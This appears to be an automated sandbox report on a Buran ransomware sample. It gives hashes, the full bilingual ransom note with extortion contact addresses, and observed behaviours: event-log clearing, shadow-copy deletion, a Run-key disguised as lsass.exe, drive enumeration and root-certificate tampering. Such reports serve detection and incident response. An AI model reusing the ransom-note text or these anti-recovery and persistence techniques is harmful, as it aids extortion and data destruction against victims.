buran | 1cdf0dcd13a46906d73588a4f2ef20637d25706ce90b53a7b6f1701c28cb3596

Resubmissions

26-03-2024 14:35

240326-ryecksfd5y 10

26-03-2024 14:27

240326-rse2xsfb8y 10

Analysis

max time kernel
1800s
max time network
1558s
platform
windows7_x64
resource
win7-20240215-en
resource tags

arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
submitted
26-03-2024 14:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dc276b7ca4a980cf487b73b4ef9c40fb93f1b00b5c757a726057ab21a0372ecf.exe
Size

478KB
MD5

1575ea1792ec080b7825066f02a5dddc
SHA1

e647358f934f78866d1f97079f66c46448efd2f0
SHA256

dc276b7ca4a980cf487b73b4ef9c40fb93f1b00b5c757a726057ab21a0372ecf
SHA512

1e492379bea54ccc2db48b1bd2ded0d77470ae960a6f78e681647526b29152a4a1ca27acca9c7181477af3c19a4e4eac0182a259fd32893b33b33f40fe14e120
SSDEEP

12288:RDVeMVRoTGavS3bRmuAyEzHU4tmo1BaKBiNr:pVeMVRo/W9mu3EzHU4co1BaKc

Score

10^/10

buran evasion persistence ransomware

Malware Config

Extracted

Path

C:\Program Files\Java\jdk1.7.0_80\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note

==== GERMAN ==== Alle Ihre Dateien, Dokumente, Fotos, Datenbanken und andere wichtige Dateien werden verschlusselt. Sie konnen es nicht selbst entschlusseln! Die einzige Methode Zum Wiederherstellen von Dateien muss ein eindeutiger privater Schlussel erworben werden. Nur wir konnen Ihnen diesen Schlussel geben und nur wir konnen Ihre Dateien wiederherstellen. Um sicher zu gehen, dass wir den Entschlusseler haben und er funktioniert, konnen Sie einen senden Senden Sie eine E-Mail an daten@cock.li oder daten@airmail.cc und entschlusseln Sie eine Datei kostenlos. Aber diese Datei sollte nicht wertvoll sein! Mochten Sie Ihre Dateien wirklich wiederherstellen? Schreiben Sie eine E-Mail an daten@cock.li daten@airmail.cc (reservieren) Ihre personliche ID: <! - ID -> Beachtung! * Benennen Sie verschlusselte Dateien nicht um. * Versuchen Sie nicht, Ihre Daten mit Software von Drittanbietern zu entschlusseln. Dies kann zu dauerhaftem Datenverlust fuhren. * Entschlusselung Ihrer Dateien mit Hilfe von Dritten moglich verursachen Sie erhohten Preis (sie addieren ihre Gebuhr zu unserem) oder Sie konnen Opfer eines Betrugs werden. ==== ENGLISH ==== All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. To be sure we have the decryptor and it works you can send an email daten@cock.li or daten@airmail.cc and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? Write to email daten@cock.li daten@airmail.cc (reserve) Your personal ID: 1DB76747-5F5B-890E-56B4-B35D45E3198E Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Emails

daten@cock.li

daten@airmail.cc

Signatures

Buran
Ransomware-as-a-service based on the VegaLocker family first identified in 2019.
ransomware buran
Clears Windows event logs 1 TTPs 3 IoCs
evasion ransomware

Indicator Removal
T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exe

pid process

1244 wevtutil.exe
2772 wevtutil.exe
872 wevtutil.exe
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Renames multiple (7242) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

1992 cmd.exe
Executes dropped EXE 5 IoCs

Processes:

lsass.exelsass.exelsass.exelsass.exelsass.exe

pid process

1256 lsass.exe
2404 lsass.exe
2916 lsass.exe
2152 lsass.exe
2516 lsass.exe

pid	process
1244	wevtutil.exe
2772	wevtutil.exe
872	wevtutil.exe

pid	process
1992	cmd.exe

pid	process
1256	lsass.exe
2404	lsass.exe
2916	lsass.exe
2152	lsass.exe
2516	lsass.exe

Loads dropped DLL 6 IoCs

Processes:

dc276b7ca4a980cf487b73b4ef9c40fb93f1b00b5c757a726057ab21a0372ecf.exeWerFault.exe

pid	process
2900	dc276b7ca4a980cf487b73b4ef9c40fb93f1b00b5c757a726057ab21a0372ecf.exe
2900	dc276b7ca4a980cf487b73b4ef9c40fb93f1b00b5c757a726057ab21a0372ecf.exe
1508	WerFault.exe
1508	WerFault.exe
1508	WerFault.exe
1508	WerFault.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\Local Security Authority Subsystem Service = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -start"	reg.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

lsass.exe

description	ioc	process
File opened (read-only)	\??\O:	lsass.exe
File opened (read-only)	\??\N:	lsass.exe
File opened (read-only)	\??\G:	lsass.exe
File opened (read-only)	\??\J:	lsass.exe
File opened (read-only)	\??\E:	lsass.exe
File opened (read-only)	\??\A:	lsass.exe
File opened (read-only)	\??\Z:	lsass.exe
File opened (read-only)	\??\Y:	lsass.exe
File opened (read-only)	\??\S:	lsass.exe
File opened (read-only)	\??\K:	lsass.exe
File opened (read-only)	\??\L:	lsass.exe
File opened (read-only)	\??\I:	lsass.exe
File opened (read-only)	\??\B:	lsass.exe
File opened (read-only)	\??\W:	lsass.exe
File opened (read-only)	\??\T:	lsass.exe
File opened (read-only)	\??\R:	lsass.exe
File opened (read-only)	\??\M:	lsass.exe
File opened (read-only)	\??\P:	lsass.exe
File opened (read-only)	\??\H:	lsass.exe
File opened (read-only)	\??\X:	lsass.exe
File opened (read-only)	\??\V:	lsass.exe
File opened (read-only)	\??\U:	lsass.exe
File opened (read-only)	\??\Q:	lsass.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

3 geoiptool.com

flow	ioc
3	geoiptool.com

Drops file in Program Files directory 64 IoCs

Processes:

lsass.exe

description	ioc	process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.nl_ja_4.4.0.v20140623020002.jar.[1DB76747-5F5B-890E-56B4-B35D45E3198E]	lsass.exe
File opened for modification	C:\Program Files\Java\jre7\lib\security\US_export_policy.jar	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02503U.BMP.[1DB76747-5F5B-890E-56B4-B35D45E3198E]	lsass.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Kathmandu.[1DB76747-5F5B-890E-56B4-B35D45E3198E]	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0103402.WMF	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBlue.png	lsass.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Atlantic\Canary	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105490.WMF	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0195248.WMF	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01064_.WMF	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02269_.WMF.[1DB76747-5F5B-890E-56B4-B35D45E3198E]	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02053J.JPG.[1DB76747-5F5B-890E-56B4-B35D45E3198E]	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychartplugin_5.5.0.165303.jar	lsass.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0168644.WMF	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE05870_.WMF	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\eclipse.inf	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net_1.2.200.v20140124-2013.jar	lsass.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	lsass.exe
File opened for modification	C:\Program Files\Microsoft Games\Multiplayer\Backgammon\it-IT\bckgzm.exe.mui	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CreateSpaceImage.jpg.[1DB76747-5F5B-890E-56B4-B35D45E3198E]	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Fancy\PLUS.GIF	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-modules_ja.jar	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_zh_CN.jar.[1DB76747-5F5B-890E-56B4-B35D45E3198E]	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLWVW.DLL.IDX_DLL.[1DB76747-5F5B-890E-56B4-B35D45E3198E]	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\+Connect to New Data Source.odc.[1DB76747-5F5B-890E-56B4-B35D45E3198E]	lsass.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0292272.WMF	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR3B.GIF	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD05119_.WMF.[1DB76747-5F5B-890E-56B4-B35D45E3198E]	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107182.WMF.[1DB76747-5F5B-890E-56B4-B35D45E3198E]	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00199_.WMF.[1DB76747-5F5B-890E-56B4-B35D45E3198E]	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115868.GIF.[1DB76747-5F5B-890E-56B4-B35D45E3198E]	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\ONENOTE_F_COL.HXK.[1DB76747-5F5B-890E-56B4-B35D45E3198E]	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Interface.zip	lsass.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\photograph.png	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher.nl_ja_4.4.0.v20140623020002.jar	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\CLIP.WMF	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\IconImagesMask.bmp	lsass.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\vlc.mo.[1DB76747-5F5B-890E-56B4-B35D45E3198E]	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SAFRI_01.MID	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLOOK.DEV.HXS.[1DB76747-5F5B-890E-56B4-B35D45E3198E]	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\Hiring Requisition - Customized.fdt	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00416_.WMF.[1DB76747-5F5B-890E-56B4-B35D45E3198E]	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+2.[1DB76747-5F5B-890E-56B4-B35D45E3198E]	lsass.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Europe\Luxembourg.[1DB76747-5F5B-890E-56B4-B35D45E3198E]	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0175361.JPG.[1DB76747-5F5B-890E-56B4-B35D45E3198E]	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\J0143744.GIF	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\EXCEL.DEV_COL.HXT.[1DB76747-5F5B-890E-56B4-B35D45E3198E]	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\INFOPATH_COL.HXT	lsass.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\MARQUEE.POC	lsass.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\btn-back-static.png	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-charts.jar	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185780.WMF	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02845G.GIF.[1DB76747-5F5B-890E-56B4-B35D45E3198E]	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\attention.gif	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Casual.gif.[1DB76747-5F5B-890E-56B4-B35D45E3198E]	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Kiritimati.[1DB76747-5F5B-890E-56B4-B35D45E3198E]	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\epl-v10.html	lsass.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\SystemV\YST9.[1DB76747-5F5B-890E-56B4-B35D45E3198E]	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0153508.WMF	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185786.WMF.[1DB76747-5F5B-890E-56B4-B35D45E3198E]	lsass.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SlateBlue.css	lsass.exe

Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

2340 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1508 2516 WerFault.exe lsass.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

2788 vssadmin.exe

pid	process
2340	sc.exe

pid	pid_target	process	target process
1508	2516	WerFault.exe	lsass.exe

pid	process
2788	vssadmin.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

dc276b7ca4a980cf487b73b4ef9c40fb93f1b00b5c757a726057ab21a0372ecf.exelsass.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	dc276b7ca4a980cf487b73b4ef9c40fb93f1b00b5c757a726057ab21a0372ecf.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	dc276b7ca4a980cf487b73b4ef9c40fb93f1b00b5c757a726057ab21a0372ecf.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	dc276b7ca4a980cf487b73b4ef9c40fb93f1b00b5c757a726057ab21a0372ecf.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	lsass.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	lsass.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2828 PING.EXE

pid	process
2828	PING.EXE

Suspicious use of AdjustPrivilegeToken 50 IoCs

Processes:

lsass.exeWMIC.exevssvc.exewevtutil.exewevtutil.exewevtutil.exe

description	pid	process
Token: SeDebugPrivilege	1256	lsass.exe
Token: SeIncreaseQuotaPrivilege	1660	WMIC.exe
Token: SeSecurityPrivilege	1660	WMIC.exe
Token: SeTakeOwnershipPrivilege	1660	WMIC.exe
Token: SeLoadDriverPrivilege	1660	WMIC.exe
Token: SeSystemProfilePrivilege	1660	WMIC.exe
Token: SeSystemtimePrivilege	1660	WMIC.exe
Token: SeProfSingleProcessPrivilege	1660	WMIC.exe
Token: SeIncBasePriorityPrivilege	1660	WMIC.exe
Token: SeCreatePagefilePrivilege	1660	WMIC.exe
Token: SeBackupPrivilege	1660	WMIC.exe
Token: SeRestorePrivilege	1660	WMIC.exe
Token: SeShutdownPrivilege	1660	WMIC.exe
Token: SeDebugPrivilege	1660	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1660	WMIC.exe
Token: SeRemoteShutdownPrivilege	1660	WMIC.exe
Token: SeUndockPrivilege	1660	WMIC.exe
Token: SeManageVolumePrivilege	1660	WMIC.exe
Token: 33	1660	WMIC.exe
Token: 34	1660	WMIC.exe
Token: 35	1660	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1660	WMIC.exe
Token: SeSecurityPrivilege	1660	WMIC.exe
Token: SeTakeOwnershipPrivilege	1660	WMIC.exe
Token: SeLoadDriverPrivilege	1660	WMIC.exe
Token: SeSystemProfilePrivilege	1660	WMIC.exe
Token: SeSystemtimePrivilege	1660	WMIC.exe
Token: SeProfSingleProcessPrivilege	1660	WMIC.exe
Token: SeIncBasePriorityPrivilege	1660	WMIC.exe
Token: SeCreatePagefilePrivilege	1660	WMIC.exe
Token: SeBackupPrivilege	1660	WMIC.exe
Token: SeRestorePrivilege	1660	WMIC.exe
Token: SeShutdownPrivilege	1660	WMIC.exe
Token: SeDebugPrivilege	1660	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1660	WMIC.exe
Token: SeRemoteShutdownPrivilege	1660	WMIC.exe
Token: SeUndockPrivilege	1660	WMIC.exe
Token: SeManageVolumePrivilege	1660	WMIC.exe
Token: 33	1660	WMIC.exe
Token: 34	1660	WMIC.exe
Token: 35	1660	WMIC.exe
Token: SeBackupPrivilege	2084	vssvc.exe
Token: SeRestorePrivilege	2084	vssvc.exe
Token: SeAuditPrivilege	2084	vssvc.exe
Token: SeSecurityPrivilege	1244	wevtutil.exe
Token: SeBackupPrivilege	1244	wevtutil.exe
Token: SeSecurityPrivilege	2772	wevtutil.exe
Token: SeBackupPrivilege	2772	wevtutil.exe
